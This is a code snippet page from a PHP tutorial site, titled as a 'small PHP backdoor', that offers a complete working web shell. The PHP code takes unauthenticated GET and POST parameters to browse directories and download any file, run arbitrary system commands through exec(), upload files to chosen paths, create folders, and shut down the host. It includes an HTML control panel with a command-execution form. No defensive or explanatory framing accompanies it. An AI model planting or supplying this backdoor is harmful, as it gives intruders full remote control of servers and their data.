>php教程 >PHP源码 >PHP小后门代码

PHP小后门代码

PHP中文网
PHP中文网원래의
2016-05-25 17:07:471224검색

1. [代码][PHP]代码    

<?php
    $fp = &#39;&#39;;
    $path = &#39;&#39;;
    if(empty($_GET[&#39;action&#39;])){
        if(empty($_GET[&#39;path&#39;])){
            $_path = dirname(__FILE__);
        }else{
            if(is_dir($_GET[&#39;path&#39;])){
                $_path = $_GET[&#39;path&#39;];
            
            }else{
            
                $_path .=  dirname($_GET[&#39;path&#39;]);
                $file_name = $_GET[&#39;path&#39;];
                if (!file_exists($file_name)) { //检查文件是否存在
                    echo "文件找不到";
                } else {
                    $file = fopen($file_name,"r"); // 打开文件 
                    // 输入文件标签
                    Header("Content-type: application/octet-stream");
                    Header("Accept-Ranges: bytes");
                    Header("Accept-Length: ".filesize($file_name));
                    Header("Content-Disposition: attachment; filename=" . str_replace(array(dirname($_GET[&#39;path&#39;]),&#39;/&#39;),&#39;&#39;,$file_name));
                    // 输出文件内容
                    echo fread($file,filesize($file_name));
                    fclose($file);
                    exit;
                } 


            }
        }
    }else if($_GET[&#39;action&#39;] == &#39;close&#39;){
        $time = intval($_GET[&#39;time&#39;]) > 0 ? intval($_GET[&#39;time&#39;]) : $_GET[&#39;time&#39;]; 
        exec(&#39;shutdown -s -t &#39;.$time);
        $_path = $_GET[&#39;path&#39;];
    }else if($_GET[&#39;action&#39;] == &#39;cancel&#39;){
        exec(&#39;shutdown -a&#39;);
        $_path = $_GET[&#39;path&#39;];
    }else if($_GET[&#39;action&#39;] == &#39;mkdir&#39;){
        $_path = $_GET[&#39;path&#39;];
        $name =  $_GET[&#39;name&#39;];
        $_path .=  $name;
        mkdir($_path);
    }else if($_GET[&#39;action&#39;] == &#39;upload&#39;){
        $_path = $_POST[&#39;path&#39;];
        $name =  $_FILES[&#39;name&#39;];

        move_uploaded_file($name[&#39;tmp_name&#39;],$_path  . $name[&#39;name&#39;] );
    }else if($_GET[&#39;action&#39;] == &#39;ord&#39;){
        $_path = $_GET[&#39;path&#39;];
        $name =  $_GET[&#39;name&#39;];
        exec($name);    
    }
	$dir = dir($_path);
?>
<table width="100%" border=1 >

<tr>
	<th colspan=3>
		<form method="get" action="" >
		目录:<input type="text" name="path" value="<?php echo $_path ?>" />
		<input type="submit" value="跳转" />
		</form>
        <input type="text" value="100" id="time">秒
        <input type="button" value="关机" onclick="location.href=&#39;?time=&#39;+document.getElementById(&#39;time&#39;).value+&#39;&action=close&path=<?php echo $fp == &#39;..&#39; ? @str_replace(&#39;\\&#39;,&#39;/&#39;,@dirname($_path)) : @str_replace(&#39;\\&#39;,&#39;/&#39;,$_path.&#39;/&#39;.$fp); ?>&#39;" />
        <input type="button" value="取消关机" onclick="location.href=&#39;?action=cancel&path=<?php echo $fp == &#39;..&#39; ? @str_replace(&#39;\\&#39;,&#39;/&#39;,@dirname($_path)) : @str_replace(&#39;\\&#39;,&#39;/&#39;,$_path.&#39;/&#39;.$fp); ?>&#39;" />

		<form method="get" action="" >
		创建目录:<input type="text" name="name" value="" />
        <input type="hidden" name="path" value="<?php echo $fp == &#39;..&#39; ? @str_replace(&#39;\\&#39;,&#39;/&#39;,@dirname($_path)) : @str_replace(&#39;\\&#39;,&#39;/&#39;,$_path.&#39;/&#39;.$fp); ?>" />
        <input type="hidden" name="action" value="mkdir">
		<input type="submit" value="创建" />
		</form>

        <form method="get" action="" >
		执行命令:<input type="text" name="name" value="" />
        <input type="hidden" name="path" value="<?php echo $fp == &#39;..&#39; ? @str_replace(&#39;\\&#39;,&#39;/&#39;,@dirname($_path)) : @str_replace(&#39;\\&#39;,&#39;/&#39;,$_path.&#39;/&#39;.$fp); ?>" />
        <input type="hidden" name="action" value="ord">
		<input type="submit" value="创建" />
		</form>

        
		<form method="post" action="?action=upload" enctype="multipart/form-data" >
		文件上传:<input type="file" name="name" value="" />
        <input type="hidden" name="path" value="<?php echo $fp == &#39;..&#39; ? @str_replace(&#39;\\&#39;,&#39;/&#39;,@dirname($_path)) : @str_replace(&#39;\\&#39;,&#39;/&#39;,$_path.&#39;/&#39;.$fp); ?>" />
		<input type="submit" value="上传" />
		</form>
	</th>
</tr>
<?php
	while($fp = $dir->read()){
?>	
<tr>
	<td><a href="?path=<?php echo $fp == &#39;..&#39; ? @dirname($_path) : $_path.&#39;/&#39;.$fp; ?>"><?php echo $fp ?></a></td>
	<td>删除</td>
	<td>下载</td>
</tr>
<?php
	}
?>
</table>

                   

                   

성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.